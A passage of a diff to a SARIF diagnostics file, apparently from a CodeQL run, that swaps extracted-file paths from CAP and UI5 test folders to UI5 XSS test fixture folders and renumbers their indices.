@@ -5856,9 +5832,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 109 + "index" : 106 } } } ], @@ -5870,7 +5846,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5882,9 +5858,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 110 + "index" : 107 } } } ], @@ -5896,7 +5872,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5908,9 +5884,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 111 + "index" : 108 } } } ], @@ -5922,7 +5898,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5934,9 +5910,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", "uriBaseId" : "%SRCROOT%", - "index" : 112 + "index" : 109 } } } ], 
@@ -5948,7 +5924,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5960,9 +5936,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 113 + "index" : 110 } } } ], @@ -5974,7 +5950,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -5986,9 +5962,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 114 + "index" : 111 } } } ], @@ -6000,7 +5976,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6012,9 +5988,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 115 + "index" : 112 } } } ], @@ -6026,7 +6002,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -6038,9 +6014,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 116 + "index" : 113 } } } ], @@ -6052,7 +6028,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6064,9 +6040,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 117 + "index" : 114 } } } ], @@ -6078,7 +6054,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6090,9 +6066,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 118 + "index" : 115 } } } ], @@ -6104,7 +6080,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6116,9 +6092,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 119 + "index" : 116 } } } ], @@ -6130,7 +6106,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -6142,9 +6118,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 120 + "index" : 117 } } } ], @@ -6156,7 +6132,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6168,9 +6144,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 121 + "index" : 118 } } } ], @@ -6182,7 +6158,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6194,9 +6170,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 122 + "index" : 119 } } } ], @@ -6208,7 +6184,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -6220,7 +6196,85 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 123 } @@ -6234,7 +6288,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -6246,7 +6300,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 124 } @@ -6260,7 +6314,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6272,7 +6326,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 125 } @@ -6286,7 +6340,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6298,7 +6352,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 126 } @@ -6312,7 +6366,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6324,7 +6378,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 127 } @@ -6338,7 +6392,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -6350,7 +6404,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", "uriBaseId" : "%SRCROOT%", "index" : 128 } @@ -6364,7 +6418,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6376,7 +6430,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 129 } @@ -6390,7 +6444,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6402,7 +6456,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 130 } @@ -6416,7 +6470,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6428,7 +6482,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 131 } @@ -6442,7 +6496,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -6454,7 +6508,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", "uriBaseId" : "%SRCROOT%", "index" : 132 } @@ -6468,7 +6522,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6480,7 +6534,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 133 } @@ -6494,7 +6548,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6506,7 +6560,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 134 } @@ -6520,7 +6574,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6532,7 +6586,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/qlpack.yml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 135 } @@ -6546,7 +6600,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -6558,7 +6612,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 136 } @@ -6572,7 +6626,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6584,7 +6638,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 137 } @@ -6598,7 +6652,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6610,7 +6664,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 138 } @@ -6624,7 +6678,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6636,7 +6690,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 139 } @@ -6650,7 +6704,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -6662,7 +6716,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", "uriBaseId" : "%SRCROOT%", "index" : 140 } @@ -6676,7 +6730,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6688,7 +6742,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 141 } @@ -6702,7 +6756,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6714,7 +6768,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 142 } @@ -6728,7 +6782,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6740,7 +6794,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 143 } 
@@ -6754,7 +6808,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6766,7 +6820,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", "uriBaseId" : "%SRCROOT%", "index" : 144 } @@ -6780,7 +6834,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6792,7 +6846,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 145 } @@ -6806,7 +6860,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6818,7 +6872,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 146 } @@ -6832,7 +6886,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -6844,7 +6898,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 147 } @@ -6858,7 +6912,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6870,7 +6924,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", "uriBaseId" : "%SRCROOT%", "index" : 148 } @@ -6884,7 +6938,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6896,7 +6950,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", "uriBaseId" : "%SRCROOT%", "index" : 149 } @@ -6910,7 +6964,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6922,7 +6976,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 150 } 
@@ -6936,7 +6990,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6948,7 +7002,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 151 } @@ -6962,7 +7016,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -6974,7 +7028,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 152 } @@ -6988,7 +7042,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7000,7 +7054,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", "uriBaseId" : "%SRCROOT%", "index" : 153 } @@ -7014,7 +7068,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -7026,7 +7080,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 154 } @@ -7040,7 +7094,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7052,7 +7106,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 155 } @@ -7066,7 +7120,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7078,7 +7132,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", "uriBaseId" : "%SRCROOT%", "index" : 156 } @@ -7092,7 +7146,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7104,7 +7158,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 157 } 
@@ -7118,7 +7172,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7130,7 +7184,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", "index" : 158 } @@ -7144,7 +7198,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7156,7 +7210,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 159 } @@ -7170,7 +7224,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7182,7 +7236,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", "uriBaseId" : "%SRCROOT%", "index" : 160 } @@ -7196,7 +7250,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { 
@@ -7208,7 +7262,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", "index" : 161 } @@ -7222,7 +7276,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7234,7 +7288,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", "uriBaseId" : "%SRCROOT%", "index" : 162 } @@ -7248,7 +7302,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7260,7 +7314,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", "uriBaseId" : "%SRCROOT%", "index" : 163 } @@ -7274,7 +7328,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -7286,7 +7340,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uri" : 